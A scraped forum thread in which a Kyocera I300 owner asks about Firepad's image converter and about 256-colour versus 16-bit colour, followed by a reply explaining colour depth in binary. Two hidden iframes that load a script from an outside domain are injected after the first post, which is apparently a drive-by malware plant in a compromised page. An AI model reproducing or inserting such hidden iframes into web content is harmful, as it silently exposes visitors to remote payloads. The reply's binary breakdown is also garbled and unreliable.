+ Reply to Thread

Firepad's fireviewer & converter

Hey fellow I300 owners,

Just got it a few days ago and it's just awesome. It's my first pda and cell, so I haven't been able to do anything but that lately. Anyways, I'm very interested in storing and viewing multimedia files on it. I've been seriously looking at firepad's viewer and converter (firepad.com). It's $20-30 for the converter while the viewer is freeware.

I downloaded the PC trial version, and it seems to work very well. It has the ability to convert pics, movs, and links to Palm compatible files, and it can compress these to fit our "tiny tiny tiny" harddrive, if you can call it that.
    Anyways, I haven't been able to find a mac trial version. I'm interested in any differencesn between the two platforms' versions. Has anyone tried it or know how either of them are?

Question for you all (coz I'm not smart):
    What's better? 256 color OR 16 bit color? I hotsynced a couple of converted pics to my I300. And it seems that the 256 color was better. That sounds right, right?? Just wonderin.

Thanks....have a great new year!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

smartphonecentral.com
    I've looked at Firepad too. Too bad it can't do movies with sound. Seems like an OS limitation? Even my MessagePad 2x00 can do movies w/sound (thanks, LeeMoon!)

8-bit color is 256 colors. 16-bit color is 65,536 colors. 255 is the largest number that an 8-bit binary number can hold (8 places). Add one more for zero, and you've got 256!

11111111 in binary = 255 in decimal

Each parenthesis represents a binary digit, above:

(12(64)(32)(16)((4)(2)(1) = 255

Extend the same logic and you've got 65,535 (+ zero) for 16-bit color!

Hope that helps.